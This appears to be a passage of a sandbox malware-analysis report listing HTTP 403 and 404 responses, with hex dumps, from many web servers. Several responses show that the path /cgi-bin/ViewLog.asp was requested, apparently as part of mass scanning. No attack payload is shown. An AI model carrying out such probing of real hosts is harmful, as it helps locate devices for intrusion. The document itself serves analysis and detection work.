    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 14 Feb 2024 08:34:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 31 30 30 70 78 22 3e 3c 62 3e 34 30 34 3c 2f 62 3e 20 d4 e0 e9 eb 20 ed e5 20 ed e0 e9 e4 e5 ed 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e cf e5 f0 e5 e9 f2 e8 20 ed e0 20 e3 eb e0 e2 ed f3 fe 20 f1 f2 f0 e0 ed e8 f6 f3 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body style="margin:100px"><b>404</b> <p><a href="/"> </a></p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 14 Feb 2024 08:35:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:55:20 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:34:12 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainCache-Control: no-cacheExpires: 0Transfer-Encoding: chunkedData Raw: 32 32 0d 0a 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: 22URL /cgi-bin/ViewLog.asp Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: MEGA-Chrome-AntileakAccess-Control-Max-Age: 86400Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:34:34 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Wed, 14 Feb 2024 08:34:38 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/json;charset=utf-8Content-Length: 0Server: Jetty(9.1.z-SNAPSHOT)
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:34:50 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:34:54 GMTConnection: CloseCache-Control: no-storeX-Content-Type-Options: nosniffX-Frame-Options: DENYStrict-Transport-Security: max-age=3123412; includeSubDomainsContent-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *; upgrade-insecure-requests
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Wed, 14 Feb 2024 08:35:00 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 382Connection: closeServer: Jetty(9.4.45.v20220203)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:39:16 GMTServer: PrHTTPD Ver1.0x-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockx-content-type-options: nosniffConnection: CloseContent-Length: 85Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 14 Feb 2024 08:35:03 GMTServer: ApacheX-Frame-Options: sameoriginContent-Length: 228Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.<br /></p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cacheConnection: closeContent-Type: text/htmlData Raw: 3c 48 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e Data Ascii: <H1>Error 404: Not Found</H1>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:35:06 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 14 Feb 2024 08:35:10 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveServer: nginxData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 20 20 20 20 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx </center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Encoding: gzipConnection: keep-aliveX-Powered-By: Undertow/1Server: WildFly/8Content-Length: 79Content-Type: text/htmlDate: Wed, 14 Feb 2024 08:35:15 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 00 b3 c9 28 c9 cd b1 b3 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 73 2d 2a ca 2f b2 d1 87 70 6c f4 21 52 49 f9 29 95 76 26 06 26 0a ba 0a 7e f9 25 0a 6e f9 a5 79 29 36 fa 60 51 a0 12 90 19 00 d8 3f 96 41 4a 00 00 00 Data Ascii: (HML),Is-*/pl!RI)v&&~%ny)6`Q?AJ
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
